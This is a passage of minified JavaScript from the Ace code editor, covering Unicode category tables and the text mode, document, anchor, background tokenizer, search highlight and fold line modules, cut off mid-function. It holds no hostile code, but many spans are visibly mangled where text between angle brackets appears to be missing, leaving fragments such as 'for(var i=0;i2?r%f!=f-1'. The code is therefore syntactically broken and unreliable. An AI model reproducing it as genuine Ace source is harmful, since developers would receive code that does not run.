-07F90830-083E0964096509700DF40E4F0E5A0E5B0F04-0F120F3A-0F3D0F850FD0-0FD4104A-104F10FB1361-13681400166D166E169B169C16EB-16ED1735173617D4-17D617D8-17DA1800-180A1944194519DE19DF1A1E1A1F1AA0-1AA61AA8-1AAD1B5A-1B601C3B-1C3F1C7E1C7F1CD32010-20272030-20432045-20512053-205E207D207E208D208E2329232A2768-277527C527C627E6-27EF2983-299829D8-29DB29FC29FD2CF9-2CFC2CFE2CFF2E00-2E2E2E302E313001-30033008-30113014-301F3030303D30A030FBA4FEA4FFA60D-A60FA673A67EA6F2-A6F7A874-A877A8CEA8CFA8F8-A8FAA92EA92FA95FA9C1-A9CDA9DEA9DFAA5C-AA5FAADEAADFABEBFD3EFD3FFE10-FE19FE30-FE52FE54-FE61FE63FE68FE6AFE6BFF01-FF03FF05-FF0AFF0C-FF0FFF1AFF1BFF1FFF20FF3B-FF3DFF3FFF5BFF5DFF5F-FF65",Pd:"002D058A05BE140018062010-20152E172E1A301C303030A0FE31FE32FE58FE63FF0D",Ps:"0028005B007B0F3A0F3C169B201A201E2045207D208D23292768276A276C276E27702772277427C527E627E827EA27EC27EE2983298529872989298B298D298F299129932995299729D829DA29FC2E222E242E262E283008300A300C300E3010301430163018301A301DFD3EFE17FE35FE37FE39FE3BFE3DFE3FFE41FE43FE47FE59FE5BFE5DFF08FF3BFF5BFF5FFF62",Pe:"0029005D007D0F3B0F3D169C2046207E208E232A2769276B276D276F27712773277527C627E727E927EB27ED27EF298429862988298A298C298E2990299229942996299829D929DB29FD2E232E252E272E293009300B300D300F3011301530173019301B301E301FFD3FFE18FE36FE38FE3AFE3CFE3EFE40FE42FE44FE48FE5AFE5CFE5EFF09FF3DFF5DFF60FF63",Pi:"00AB2018201B201C201F20392E022E042E092E0C2E1C2E20",Pf:"00BB2019201D203A2E032E052E0A2E0D2E1D2E21",Pc:"005F203F20402054FE33FE34FE4D-FE4FFF3F",Po:"0021-00230025-0027002A002C002E002F003A003B003F0040005C00A100B700BF037E0387055A-055F058905C005C305C605F305F40609060A060C060D061B061E061F066A-066D06D40700-070D07F7-07F90830-083E0964096509700DF40E4F0E5A0E5B0F04-0F120F850FD0-0FD4104A-104F10FB1361-1368166D166E16EB-16ED1735173617D4-17D617D8-17DA1800-18051807-180A1944194519DE19DF1A1E1A1F1AA0-1AA61AA8-1AAD1B5A-1B601C3B-1C3F1C7E1C7F1CD3201620172020-20272030-2038203B-203E2041-20432047-205120532055-205E2CF9-2CFC2CFE2CFF2E002E012E06-2E082E0B2E0E-2E162E182E192E1B2E1E2E1F2E2A-2E2E2E302E313001-3003303D30FBA4FEA4FFA60D-A60FA673A67EA6F2-A6F7A874-A877A8CEA8CFA8F8-A8FAA92EA92FA95FA9C1-A9CDA9DEA9DFAA5C-AA5FAADEAADFABEBFE10-FE16FE19FE30FE45FE46FE49-FE4CFE50-FE52FE54-FE57FE5F-FE61FE68FE6AFE6BFF01-FF03FF05-FF07FF0AFF0CFF0EFF0FFF1AFF1BFF1FFF20FF3CFF61FF64FF65",S:"0024002B003C-003E005E0060007C007E00A2-00A900AC00AE-00B100B400B600B800D700F702C2-02C502D2-02DF02E5-02EB02ED02EF-02FF03750384038503F604820606-0608060B060E060F06E906FD06FE07F609F209F309FA09FB0AF10B700BF3-0BFA0C7F0CF10CF20D790E3F0F01-0F030F13-0F170F1A-0F1F0F340F360F380FBE-0FC50FC7-0FCC0FCE0FCF0FD5-0FD8109E109F13601390-139917DB194019E0-19FF1B61-1B6A1B74-1B7C1FBD1FBF-1FC11FCD-1FCF1FDD-1FDF1FED-1FEF1FFD1FFE20442052207A-207C208A-208C20A0-20B8210021012103-21062108210921142116-2118211E-2123212521272129212E213A213B2140-2144214A-214D214F2190-2328232B-23E82400-24262440-244A249C-24E92500-26CD26CF-26E126E326E8-26FF2701-27042706-2709270C-27272729-274B274D274F-27522756-275E2761-276727942798-27AF27B1-27BE27C0-27C427C7-27CA27CC27D0-27E527F0-29822999-29D729DC-29FB29FE-2B4C2B50-2B592CE5-2CEA2E80-2E992E9B-2EF32F00-2FD52FF0-2FFB300430123013302030363037303E303F309B309C319031913196-319F31C0-31E33200-321E322A-32503260-327F328A-32B032C0-32FE3300-33FF4DC0-4DFFA490-A4C6A700-A716A720A721A789A78AA828-A82BA836-A839AA77-AA79FB29FDFCFDFDFE62FE64-FE66FE69FF04FF0BFF1C-FF1EFF3EFF40FF5CFF5EFFE0-FFE6FFE8-FFEEFFFCFFFD",Sm:"002B003C-003E007C007E00AC00B100D700F703F60606-060820442052207A-207C208A-208C2140-2144214B2190-2194219A219B21A021A321A621AE21CE21CF21D221D421F4-22FF2308-230B23202321237C239B-23B323DC-23E125B725C125F8-25FF266F27C0-27C427C7-27CA27CC27D0-27E527F0-27FF2900-29822999-29D729DC-29FB29FE-2AFF2B30-2B442B47-2B4CFB29FE62FE64-FE66FF0BFF1C-FF1EFF5CFF5EFFE2FFE9-FFEC",Sc:"002400A2-00A5060B09F209F309FB0AF10BF90E3F17DB20A0-20B8A838FDFCFE69FF04FFE0FFE1FFE5FFE6",Sk:"005E006000A800AF00B400B802C2-02C502D2-02DF02E5-02EB02ED02EF-02FF0375038403851FBD1FBF-1FC11FCD-1FCF1FDD-1FDF1FED-1FEF1FFD1FFE309B309CA700-A716A720A721A789A78AFF3EFF40FFE3",So:"00A600A700A900AE00B000B60482060E060F06E906FD06FE07F609FA0B700BF3-0BF80BFA0C7F0CF10CF20D790F01-0F030F13-0F170F1A-0F1F0F340F360F380FBE-0FC50FC7-0FCC0FCE0FCF0FD5-0FD8109E109F13601390-1399194019E0-19FF1B61-1B6A1B74-1B7C210021012103-21062108210921142116-2118211E-2123212521272129212E213A213B214A214C214D214F2195-2199219C-219F21A121A221A421A521A7-21AD21AF-21CD21D021D121D321D5-21F32300-2307230C-231F2322-2328232B-237B237D-239A23B4-23DB23E2-23E82400-24262440-244A249C-24E92500-25B625B8-25C025C2-25F72600-266E2670-26CD26CF-26E126E326E8-26FF2701-27042706-2709270C-27272729-274B274D274F-27522756-275E2761-276727942798-27AF27B1-27BE2800-28FF2B00-2B2F2B452B462B50-2B592CE5-2CEA2E80-2E992E9B-2EF32F00-2FD52FF0-2FFB300430123013302030363037303E303F319031913196-319F31C0-31E33200-321E322A-32503260-327F328A-32B032C0-32FE3300-33FF4DC0-4DFFA490-A4C6A828-A82BA836A837A839AA77-AA79FDFDFFE4FFE8FFEDFFEEFFFCFFFD",Z:"002000A01680180E2000-200A20282029202F205F3000",Zs:"002000A01680180E2000-200A202F205F3000",Zl:"2028",Zp:"2029",C:"0000-001F007F-009F00AD03780379037F-0383038B038D03A20526-05300557055805600588058B-059005C8-05CF05EB-05EF05F5-0605061C061D0620065F06DD070E070F074B074C07B2-07BF07FB-07FF082E082F083F-08FF093A093B094F095609570973-097809800984098D098E0991099209A909B109B3-09B509BA09BB09C509C609C909CA09CF-09D609D8-09DB09DE09E409E509FC-0A000A040A0B-0A0E0A110A120A290A310A340A370A3A0A3B0A3D0A43-0A460A490A4A0A4E-0A500A52-0A580A5D0A5F-0A650A76-0A800A840A8E0A920AA90AB10AB40ABA0ABB0AC60ACA0ACE0ACF0AD1-0ADF0AE40AE50AF00AF2-0B000B040B0D0B0E0B110B120B290B310B340B3A0B3B0B450B460B490B4A0B4E-0B550B58-0B5B0B5E0B640B650B72-0B810B840B8B-0B8D0B910B96-0B980B9B0B9D0BA0-0BA20BA5-0BA70BAB-0BAD0BBA-0BBD0BC3-0BC50BC90BCE0BCF0BD1-0BD60BD8-0BE50BFB-0C000C040C0D0C110C290C340C3A-0C3C0C450C490C4E-0C540C570C5A-0C5F0C640C650C70-0C770C800C810C840C8D0C910CA90CB40CBA0CBB0CC50CC90CCE-0CD40CD7-0CDD0CDF0CE40CE50CF00CF3-0D010D040D0D0D110D290D3A-0D3C0D450D490D4E-0D560D58-0D5F0D640D650D76-0D780D800D810D840D97-0D990DB20DBC0DBE0DBF0DC7-0DC90DCB-0DCE0DD50DD70DE0-0DF10DF5-0E000E3B-0E3E0E5C-0E800E830E850E860E890E8B0E8C0E8E-0E930E980EA00EA40EA60EA80EA90EAC0EBA0EBE0EBF0EC50EC70ECE0ECF0EDA0EDB0EDE-0EFF0F480F6D-0F700F8C-0F8F0F980FBD0FCD0FD9-0FFF10C6-10CF10FD-10FF1249124E124F12571259125E125F1289128E128F12B112B612B712BF12C112C612C712D7131113161317135B-135E137D-137F139A-139F13F5-13FF169D-169F16F1-16FF170D1715-171F1737-173F1754-175F176D17711774-177F17B417B517DE17DF17EA-17EF17FA-17FF180F181A-181F1878-187F18AB-18AF18F6-18FF191D-191F192C-192F193C-193F1941-1943196E196F1975-197F19AC-19AF19CA-19CF19DB-19DD1A1C1A1D1A5F1A7D1A7E1A8A-1A8F1A9A-1A9F1AAE-1AFF1B4C-1B4F1B7D-1B7F1BAB-1BAD1BBA-1BFF1C38-1C3A1C4A-1C4C1C80-1CCF1CF3-1CFF1DE7-1DFC1F161F171F1E1F1F1F461F471F4E1F4F1F581F5A1F5C1F5E1F7E1F7F1FB51FC51FD41FD51FDC1FF01FF11FF51FFF200B-200F202A-202E2060-206F20722073208F2095-209F20B9-20CF20F1-20FF218A-218F23E9-23FF2427-243F244B-245F26CE26E226E4-26E727002705270A270B2728274C274E2753-2755275F27602795-279727B027BF27CB27CD-27CF2B4D-2B4F2B5A-2BFF2C2F2C5F2CF2-2CF82D26-2D2F2D66-2D6E2D70-2D7F2D97-2D9F2DA72DAF2DB72DBF2DC72DCF2DD72DDF2E32-2E7F2E9A2EF4-2EFF2FD6-2FEF2FFC-2FFF3040309730983100-3104312E-3130318F31B8-31BF31E4-31EF321F32FF4DB6-4DBF9FCC-9FFFA48D-A48FA4C7-A4CFA62C-A63FA660A661A674-A67BA698-A69FA6F8-A6FFA78D-A7FAA82C-A82FA83A-A83FA878-A87FA8C5-A8CDA8DA-A8DFA8FC-A8FFA954-A95EA97D-A97FA9CEA9DA-A9DDA9E0-A9FFAA37-AA3FAA4EAA4FAA5AAA5BAA7C-AA7FAAC3-AADAAAE0-ABBFABEEABEFABFA-ABFFD7A4-D7AFD7C7-D7CAD7FC-F8FFFA2EFA2FFA6EFA6FFADA-FAFFFB07-FB12FB18-FB1CFB37FB3DFB3FFB42FB45FBB2-FBD2FD40-FD4FFD90FD91FDC8-FDEFFDFEFDFFFE1A-FE1FFE27-FE2FFE53FE67FE6C-FE6FFE75FEFD-FF00FFBF-FFC1FFC8FFC9FFD0FFD1FFD8FFD9FFDD-FFDFFFE7FFEF-FFFBFFFEFFFF",Cc:"0000-001F007F-009F",Cf:"00AD0600-060306DD070F17B417B5200B-200F202A-202E2060-2064206A-206FFEFFFFF9-FFFB",Co:"E000-F8FF",Cs:"D800-DFFF",Cn:"03780379037F-0383038B038D03A20526-05300557055805600588058B-059005C8-05CF05EB-05EF05F5-05FF06040605061C061D0620065F070E074B074C07B2-07BF07FB-07FF082E082F083F-08FF093A093B094F095609570973-097809800984098D098E0991099209A909B109B3-09B509BA09BB09C509C609C909CA09CF-09D609D8-09DB09DE09E409E509FC-0A000A040A0B-0A0E0A110A120A290A310A340A370A3A0A3B0A3D0A43-0A460A490A4A0A4E-0A500A52-0A580A5D0A5F-0A650A76-0A800A840A8E0A920AA90AB10AB40ABA0ABB0AC60ACA0ACE0ACF0AD1-0ADF0AE40AE50AF00AF2-0B000B040B0D0B0E0B110B120B290B310B340B3A0B3B0B450B460B490B4A0B4E-0B550B58-0B5B0B5E0B640B650B72-0B810B840B8B-0B8D0B910B96-0B980B9B0B9D0BA0-0BA20BA5-0BA70BAB-0BAD0BBA-0BBD0BC3-0BC50BC90BCE0BCF0BD1-0BD60BD8-0BE50BFB-0C000C040C0D0C110C290C340C3A-0C3C0C450C490C4E-0C540C570C5A-0C5F0C640C650C70-0C770C800C810C840C8D0C910CA90CB40CBA0CBB0CC50CC90CCE-0CD40CD7-0CDD0CDF0CE40CE50CF00CF3-0D010D040D0D0D110D290D3A-0D3C0D450D490D4E-0D560D58-0D5F0D640D650D76-0D780D800D810D840D97-0D990DB20DBC0DBE0DBF0DC7-0DC90DCB-0DCE0DD50DD70DE0-0DF10DF5-0E000E3B-0E3E0E5C-0E800E830E850E860E890E8B0E8C0E8E-0E930E980EA00EA40EA60EA80EA90EAC0EBA0EBE0EBF0EC50EC70ECE0ECF0EDA0EDB0EDE-0EFF0F480F6D-0F700F8C-0F8F0F980FBD0FCD0FD9-0FFF10C6-10CF10FD-10FF1249124E124F12571259125E125F1289128E128F12B112B612B712BF12C112C612C712D7131113161317135B-135E137D-137F139A-139F13F5-13FF169D-169F16F1-16FF170D1715-171F1737-173F1754-175F176D17711774-177F17DE17DF17EA-17EF17FA-17FF180F181A-181F1878-187F18AB-18AF18F6-18FF191D-191F192C-192F193C-193F1941-1943196E196F1975-197F19AC-19AF19CA-19CF19DB-19DD1A1C1A1D1A5F1A7D1A7E1A8A-1A8F1A9A-1A9F1AAE-1AFF1B4C-1B4F1B7D-1B7F1BAB-1BAD1BBA-1BFF1C38-1C3A1C4A-1C4C1C80-1CCF1CF3-1CFF1DE7-1DFC1F161F171F1E1F1F1F461F471F4E1F4F1F581F5A1F5C1F5E1F7E1F7F1FB51FC51FD41FD51FDC1FF01FF11FF51FFF2065-206920722073208F2095-209F20B9-20CF20F1-20FF218A-218F23E9-23FF2427-243F244B-245F26CE26E226E4-26E727002705270A270B2728274C274E2753-2755275F27602795-279727B027BF27CB27CD-27CF2B4D-2B4F2B5A-2BFF2C2F2C5F2CF2-2CF82D26-2D2F2D66-2D6E2D70-2D7F2D97-2D9F2DA72DAF2DB72DBF2DC72DCF2DD72DDF2E32-2E7F2E9A2EF4-2EFF2FD6-2FEF2FFC-2FFF3040309730983100-3104312E-3130318F31B8-31BF31E4-31EF321F32FF4DB6-4DBF9FCC-9FFFA48D-A48FA4C7-A4CFA62C-A63FA660A661A674-A67BA698-A69FA6F8-A6FFA78D-A7FAA82C-A82FA83A-A83FA878-A87FA8C5-A8CDA8DA-A8DFA8FC-A8FFA954-A95EA97D-A97FA9CEA9DA-A9DDA9E0-A9FFAA37-AA3FAA4EAA4FAA5AAA5BAA7C-AA7FAAC3-AADAAAE0-ABBFABEEABEFABFA-ABFFD7A4-D7AFD7C7-D7CAD7FC-D7FFFA2EFA2FFA6EFA6FFADA-FAFFFB07-FB12FB18-FB1CFB37FB3DFB3FFB42FB45FBB2-FBD2FD40-FD4FFD90FD91FDC8-FDEFFDFEFDFFFE1A-FE1FFE27-FE2FFE53FE67FE6C-FE6FFE75FEFDFEFEFF00FFBF-FFC1FFC8FFC9FFD0FFD1FFD8FFD9FFDD-FFDFFFE7FFEF-FFF8FFFEFFFF"})}),ace.define("ace/mode/text",["require","exports","module","ace/tokenizer","ace/mode/text_highlight_rules","ace/mode/behaviour/cstyle","ace/unicode","ace/lib/lang","ace/token_iterator","ace/range"],function(e,t,n){"use strict";var r=e("../tokenizer").Tokenizer,i=e("./text_highlight_rules").TextHighlightRules,s=e("./behaviour/cstyle").CstyleBehaviour,o=e("../unicode"),u=e("../lib/lang"),a=e("../token_iterator").TokenIterator,f=e("../range").Range,l=function(){this.HighlightRules=i};(function(){this.$defaultBehaviour=new s,this.tokenRe=new RegExp("^["+o.packages.L+o.packages.Mn+o.packages.Mc+o.packages.Nd+o.packages.Pc+"\\$_]+","g"),this.nonTokenRe=new RegExp("^(?:[^"+o.packages.L+o.packages.Mn+o.packages.Mc+o.packages.Nd+o.packages.Pc+"\\$_]|\\s])+","g"),this.getTokenizer=function(){return this.$tokenizer||(this.$highlightRules=this.$highlightRules||new this.HighlightRules(this.$highlightRuleConfig),this.$tokenizer=new r(this.$highlightRules.getRules())),this.$tokenizer},this.lineCommentStart="",this.blockComment="",this.toggleCommentLines=function(e,t,n,r){function w(e){for(var t=n;t<=r;t++)e(i.getLine(t),t)}var i=t.doc,s=!0,o=!0,a=Infinity,f=t.getTabSize(),l=!1;if(!this.lineCommentStart){if(!this.blockComment)return!1;var c=this.blockComment.start,h=this.blockComment.end,p=new RegExp("^(\\s*)(?:"+u.escapeRegExp(c)+")"),d=new RegExp("(?:"+u.escapeRegExp(h)+")\\s*$"),v=function(e,t){if(g(e,t))return;if(!s||/\S/.test(e))i.insertInLine({row:t,column:e.length},h),i.insertInLine({row:t,column:a},c)},m=function(e,t){var n;(n=e.match(d))&&i.removeInLine(t,e.length-n[0].length,e.length),(n=e.match(p))&&i.removeInLine(t,n[1].length,n[0].length)},g=function(e,n){if(p.test(e))return!0;var r=t.getTokens(n);for(var i=0;i2?r%f!=f-1:r%f==0}}var E=Infinity;w(function(e,t){var n=e.search(/\S/);n!==-1?(ne.length&&(E=e.length)}),a==Infinity&&(a=E,s=!1,o=!1),l&&a%f!=0&&(a=Math.floor(a/f)*f),w(o?m:v)},this.toggleBlockComment=function(e,t,n,r){var i=this.blockComment;if(!i)return;!i.start&&i[0]&&(i=i[0]);var s=new a(t,r.row,r.column),o=s.getCurrentToken(),u=t.selection,l=t.selection.toOrientedRange(),c,h;if(o&&/comment/.test(o.type)){var p,d;while(o&&/comment/.test(o.type)){var v=o.value.indexOf(i.start);if(v!=-1){var m=s.getCurrentTokenRow(),g=s.getCurrentTokenColumn()+v;p=new f(m,g,m,g+i.start.length);break}o=s.stepBackward()}var s=new a(t,r.row,r.column),o=s.getCurrentToken();while(o&&/comment/.test(o.type)){var v=o.value.indexOf(i.end);if(v!=-1){var m=s.getCurrentTokenRow(),g=s.getCurrentTokenColumn()+v;d=new f(m,g,m,g+i.end.length);break}o=s.stepForward()}d&&t.remove(d),p&&(t.remove(p),c=p.start.row,h=-i.start.length)}else h=i.start.length,c=n.start.row,t.insert(n.end,i.end),t.insert(n.start,i.start);l.start.row==c&&(l.start.column+=h),l.end.row==c&&(l.end.column+=h),t.selection.fromOrientedRange(l)},this.getNextLineIndent=function(e,t,n){return this.$getIndent(t)},this.checkOutdent=function(e,t,n){return!1},this.autoOutdent=function(e,t,n){},this.$getIndent=function(e){return e.match(/^\s*/)[0]},this.createWorker=function(e){return null},this.createModeDelegates=function(e){this.$embeds=[],this.$modes={};for(var t in e)e[t]&&(this.$embeds.push(t),this.$modes[t]=new e[t]);var n=["toggleBlockComment","toggleCommentLines","getNextLineIndent","checkOutdent","autoOutdent","transformAction","getCompletions"];for(var t=0;t=0&&t.row=0&&t.column<=e[t.row].length}function s(e,t){t.action!="insert"&&t.action!="remove"&&r(t,"delta.action must be 'insert' or 'remove'"),t.lines instanceof Array||r(t,"delta.lines must be an Array"),(!t.start||!t.end)&&r(t,"delta.start/end must be an present");var n=t.start;i(e,t.start)||r(t,"delta.start must be contained in document");var s=t.end;t.action=="remove"&&!i(e,s)&&r(t,"delta.end must contained in document for 'remove' actions");var o=s.row-n.row,u=s.column-(o==0?n.column:0);(o!=t.lines.length-1||t.lines[o].length!=u)&&r(t,"delta.range must match delta lines")}t.applyDelta=function(e,t,n){var r=t.start.row,i=t.start.column,s=e[r]||"";switch(t.action){case"insert":var o=t.lines;if(o.length===1)e[r]=s.substring(0,i)+t.lines[0]+s.substring(i);else{var u=[r,1].concat(t.lines);e.splice.apply(e,u),e[r]=s.substring(0,i)+e[r],e[r+t.lines.length-1]+=s.substring(i)}break;case"remove":var a=t.end.column,f=t.end.row;r===f?e[r]=s.substring(0,i)+s.substring(a):e.splice(r,f-r+1,s.substring(0,i)+e[f].substring(a))}}}),ace.define("ace/anchor",["require","exports","module","ace/lib/oop","ace/lib/event_emitter"],function(e,t,n){"use strict";var r=e("./lib/oop"),i=e("./lib/event_emitter").EventEmitter,s=t.Anchor=function(e,t,n){this.$onChange=this.onChange.bind(this),this.attach(e),typeof n=="undefined"?this.setPosition(t.row,t.column):this.setPosition(t,n)};(function(){function e(e,t,n){var r=n?e.column<=t.column:e.columnthis.row)return;var n=t(e,{row:this.row,column:this.column},this.$insertRight);this.setPosition(n.row,n.column,!0)},this.setPosition=function(e,t,n){var r;n?r={row:e,column:t}:r=this.$clipPositionToDocument(e,t);if(this.row==r.row&&this.column==r.column)return;var i={row:this.row,column:this.column};this.row=r.row,this.column=r.column,this._signal("change",{old:i,value:r})},this.detach=function(){this.document.removeEventListener("change",this.$onChange)},this.attach=function(e){this.document=e||this.document,this.document.on("change",this.$onChange)},this.$clipPositionToDocument=function(e,t){var n={};return e>=this.document.getLength()?(n.row=Math.max(0,this.document.getLength()-1),n.column=this.document.getLine(n.row).length):e<0?(n.row=0,n.column=0):(n.row=e,n.column=Math.min(this.document.getLine(n.row).length,Math.max(0,t))),t<0&&(n.column=0),n}}).call(s.prototype)}),ace.define("ace/document",["require","exports","module","ace/lib/oop","ace/apply_delta","ace/lib/event_emitter","ace/range","ace/anchor"],function(e,t,n){"use strict";var r=e("./lib/oop"),i=e("./apply_delta").applyDelta,s=e("./lib/event_emitter").EventEmitter,o=e("./range").Range,u=e("./anchor").Anchor,a=function(e){this.$lines=[""],e.length===0?this.$lines=[""]:Array.isArray(e)?this.insertMergedLines({row:0,column:0},e):this.insert({row:0,column:0},e)};(function(){r.implement(this,s),this.setValue=function(e){var t=this.getLength()-1;this.remove(new o(0,0,t,this.getLine(t).length)),this.insert({row:0,column:0},e)},this.getValue=function(){return this.getAllLines().join(this.getNewLineCharacter())},this.createAnchor=function(e,t){return new u(this,e,t)},"aaa".split(/a/).length===0?this.$split=function(e){return e.replace(/\r\n|\r/g,"\n").split("\n")}:this.$split=function(e){return e.split(/\r\n|\r|\n/)},this.$detectNewLine=function(e){var t=e.match(/^.*?(\r\n|\r|\n)/m);this.$autoNewLine=t?t[1]:"\n",this._signal("changeNewLineMode")},this.getNewLineCharacter=function(){switch(this.$newLineMode){case"windows":return"\r\n";case"unix":return"\n";default:return this.$autoNewLine||"\n"}},this.$autoNewLine="",this.$newLineMode="auto",this.setNewLineMode=function(e){if(this.$newLineMode===e)return;this.$newLineMode=e,this._signal("changeNewLineMode")},this.getNewLineMode=function(){return this.$newLineMode},this.isNewLine=function(e){return e=="\r\n"||e=="\r"||e=="\n"},this.getLine=function(e){return this.$lines[e]||""},this.getLines=function(e,t){return this.$lines.slice(e,t+1)},this.getAllLines=function(){return this.getLines(0,this.getLength())},this.getLength=function(){return this.$lines.length},this.getTextRange=function(e){return this.getLinesForRange(e).join(this.getNewLineCharacter())},this.getLinesForRange=function(e){var t;if(e.start.row===e.end.row)t=[this.getLine(e.start.row).substring(e.start.column,e.end.column)];else{t=this.getLines(e.start.row,e.end.row),t[0]=(t[0]||"").substring(e.start.column);var n=t.length-1;e.end.row-e.start.row==n&&(t[n]=t[n].substring(0,e.end.column))}return t},this.insertLines=function(e,t){return console.warn("Use of document.insertLines is deprecated. Use the insertFullLines method instead."),this.insertFullLines(e,t)},this.removeLines=function(e,t){return console.warn("Use of document.removeLines is deprecated. Use the removeFullLines method instead."),this.removeFullLines(e,t)},this.insertNewLine=function(e){return console.warn("Use of document.insertNewLine is deprecated. Use insertMergedLines(position, ['', '']) instead."),this.insertMergedLines(e,["",""])},this.insert=function(e,t){return this.getLength()<=1&&this.$detectNewLine(t),this.insertMergedLines(e,this.$split(t))},this.insertInLine=function(e,t){var n=this.clippedPos(e.row,e.column),r=this.pos(e.row,e.column+t.length);return this.applyDelta({start:n,end:r,action:"insert",lines:[t]},!0),this.clonePos(r)},this.clippedPos=function(e,t){var n=this.getLength();e===undefined?e=n:e<0?e=0:e>=n&&(e=n-1,t=undefined);var r=this.getLine(e);return t==undefined&&(t=r.length),t=Math.min(Math.max(t,0),r.length),{row:e,column:t}},this.clonePos=function(e){return{row:e.row,column:e.column}},this.pos=function(e,t){return{row:e,column:t}},this.$clipPosition=function(e){var t=this.getLength();return e.row>=t?(e.row=Math.max(0,t-1),e.column=this.getLine(t-1).length):(e.row=Math.max(0,e.row),e.column=Math.min(Math.max(e.column,0),this.getLine(e.row).length)),e},this.insertFullLines=function(e,t){e=Math.min(Math.max(e,0),this.getLength());var n=0;e0,r=t=0&&this.applyDelta({start:this.pos(e,this.getLine(e).length),end:this.pos(e+1,0),action:"remove",lines:["",""]})},this.replace=function(e,t){e instanceof o||(e=o.fromPoints(e.start,e.end));if(t.length===0&&e.isEmpty())return e.start;if(t==this.getTextRange(e))return e.end;this.remove(e);var n;return t?n=this.insert(e.start,t):n=e.start,n},this.applyDeltas=function(e){for(var t=0;t=0;t--)this.revertDelta(e[t])},this.applyDelta=function(e,t){var n=e.action=="insert";if(n?e.lines.length<=1&&!e.lines[0]:!o.comparePoints(e.start,e.end))return;n&&e.lines.length>2e4&&this.$splitAndapplyLargeDelta(e,2e4),i(this.$lines,e,t),this._signal("change",e)},this.$splitAndapplyLargeDelta=function(e,t){var n=e.lines,r=n.length,i=e.start.row,s=e.start.column,o=0,u=0;do{o=u,u+=t-1;var a=n.slice(o,u);if(u>r){e.lines=a,e.start.row=i+o,e.start.column=s;break}a.push(""),this.applyDelta({start:this.pos(i+o,s),end:this.pos(i+u,s=0),action:e.action,lines:a},!0)}while(!0)},this.revertDelta=function(e){this.applyDelta({start:this.clonePos(e.start),end:this.clonePos(e.end),action:e.action=="insert"?"remove":"insert",lines:e.lines.slice()})},this.indexToPosition=function(e,t){var n=this.$lines||this.getAllLines(),r=this.getNewLineCharacter().length;for(var i=t||0,s=n.length;i20){n.running=setTimeout(n.$worker,20);break}}n.currentLine=t,s<=r&&n.fireUpdateEvent(s,r)}};(function(){r.implement(this,i),this.setTokenizer=function(e){this.tokenizer=e,this.lines=[],this.states=[],this.start(0)},this.setDocument=function(e){this.doc=e,this.lines=[],this.states=[],this.stop()},this.fireUpdateEvent=function(e,t){var n={first:e,last:t};this._signal("update",{data:n})},this.start=function(e){this.currentLine=Math.min(e||0,this.currentLine,this.doc.getLength()),this.lines.splice(this.currentLine,this.lines.length),this.states.splice(this.currentLine,this.states.length),this.stop(),this.running=setTimeout(this.$worker,700)},this.scheduleStart=function(){this.running||(this.running=setTimeout(this.$worker,700))},this.$updateOnChange=function(e){var t=e.start.row,n=e.end.row-t;if(n===0)this.lines[t]=null;else if(e.action=="remove")this.lines.splice(t,n+1,null),this.states.splice(t,n+1,null);else{var r=Array(n+1);r.unshift(t,1),this.lines.splice.apply(this.lines,r),this.states.splice.apply(this.states,r)}this.currentLine=Math.min(t,this.currentLine,this.doc.getLength()),this.stop()},this.stop=function(){this.running&&clearTimeout(this.running),this.running=!1},this.getTokens=function(e){return this.lines[e]||this.$tokenizeRow(e)},this.getState=function(e){return this.currentLine==e&&this.$tokenizeRow(e),this.states[e]||"start"},this.$tokenizeRow=function(e){var t=this.doc.getLine(e),n=this.states[e-1],r=this.tokenizer.getLineTokens(t,n,e);return this.states[e]+""!=r.state+""?(this.states[e]=r.state,this.lines[e+1]=null,this.currentLine>e+1&&(this.currentLine=e+1)):this.currentLine==e&&(this.currentLine=e+1),this.lines[e]=r.tokens}}).call(s.prototype),t.BackgroundTokenizer=s}),ace.define("ace/search_highlight",["require","exports","module","ace/lib/lang","ace/lib/oop","ace/range"],function(e,t,n){"use strict";var r=e("./lib/lang"),i=e("./lib/oop"),s=e("./range").Range,o=function(e,t,n){this.setRegexp(e),this.clazz=t,this.type=n||"text"};(function(){this.MAX_RANGES=500,this.setRegexp=function(e){if(this.regExp+""==e+"")return;this.regExp=e,this.cache=[]},this.update=function(e,t,n,i){if(!this.regExp)return;var o=i.firstRow,u=i.lastRow;for(var a=o;a<=u;a++){var f=this.cache[a];f==null&&(f=r.getMatchOffsets(n.getLine(a),this.regExp),f.length>this.MAX_RANGES&&(f=f.slice(0,this.MAX_RANGES)),f=f.map(function(e){return new s(a,e.offset,a,e.offset+e.length)}),this.cache[a]=f.length?f:"");for(var l=f.length;l--;)t.drawSingleLineMarker(e,f[l].toScreenRange(n),this.clazz,i)}}}).call(o.prototype),t.SearchHighlight=o}),ace.define("ace/edit_session/fold_line",["require","exports","module","ace/range"],function(e,t,n){"use strict";function i(e,t){this.foldData=e,Array.isArray(t)?this.folds=t:t=this.folds=[t];var n=t[t.length-1];this.range=new r(t[0].start.row,t[0].start.column,n.end.row,n.end.column),this.start=this.range.start,this.end=this.range.end,this.folds.forEach(function(e){e.setFoldLine(this)},this)}var r=e("../range").Range;(function(){this.shiftRow=function(e){this.start.row+=e,this.end.row+=e,this.folds.forEach(function(t){t.start.row+=e,t.end.row+=e})},this.addFold=function(e){if(e.sameRow){if(e.start.rowthis.endRow)throw new Error("Can't add a fold to this FoldLine as it has no connection");this.folds.push(e),this.folds.sort(function(e,t){return-e.range.compareEnd(t.start.row,t.start.column)}),this.range.compareEnd(e.start.row,e.start.column)>0?(this.end.row=e.end.row,this.end.column=e.end.column):this.range.compareStart(e.end.row,e.end.column)<0&&(this.start.row=e.start.row,this.start.column=e.start.column)}else if(e.start.row==this.end.row)this.folds.push(e),this.end.row=e.end.row,this.end.column=e.end.column;else{if(e.end.row!=this.start.row)throw new Error("Trying to add fold to FoldRow that doesn't have a matching row");this.folds.unshift(e),this.start.row=e.start.row,this.start.column=e.start.column}e.foldLine=this},this.containsRow=function(e){return e>=this.start.row&&e<=this.end.row},this.walk=function(e,t,n){var r=0,i=this.folds,s,o,u,a=!0;t==null&&(t=this.end.row,n=this.end.column);for(var f=0;f0)continue;var a=i(e,o.start);return u===0?t&&a!==0?-s-2:s:a>0||a===0&&!t?s:-s-1}return-s-1},this.add=function(e){var t=!e.isEmpty(),n=this.pointIndex(e.start,t);n<0&&(n=-n-1);var r=this.pointIndex(e.end,t,n);return r<0?r=-r-1:r++,this.ranges.splice(n,r-n,e)},this.addList=function(e){var t=[];for(var n=e.length;n--;)t.push.apply(t,this.add(e[n]));return t},this.substractPoint=function(e){var t=this.pointIndex(e);if(t>=0)return this.ranges.splice(t,1)},this.merge=function(){var 